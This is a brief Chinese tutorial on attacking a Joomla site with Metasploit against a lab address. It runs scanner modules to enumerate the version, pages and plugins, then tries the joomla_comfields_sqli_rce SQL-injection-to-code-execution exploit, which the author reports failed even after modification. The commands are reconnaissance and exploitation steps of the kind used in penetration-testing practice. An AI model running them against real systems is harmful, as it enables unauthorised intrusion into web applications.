一、使用Metasploit对Joomal进行侦察
1、探测版本信息
选择joomla_version辅助模块,设置端口号及IP地址,run运行
use auxiliary/scanner/http/joomla_version
set rhosts 192.168.1.111
set rport 8080
run
2、页面枚举
选择Joomla_pages辅助模块,设置端口号及IP地址,run运行
use auxiliary/scanner/http/joomla_pages
set rhosts 192.168.1.111
set rport 8080
run
3、插件枚举
选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行
use auxiliary/scanner/http/joomla_plugins
set rhosts 192.168.1.111
set rport 8080
run
二、使用Metasploit对Joomla进行漏洞利用
1、use unix/webapp/joomla_comfields_sqli_rce
2、set rhosts 192.168.1.111
3、set rport 8080
4、run
5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。
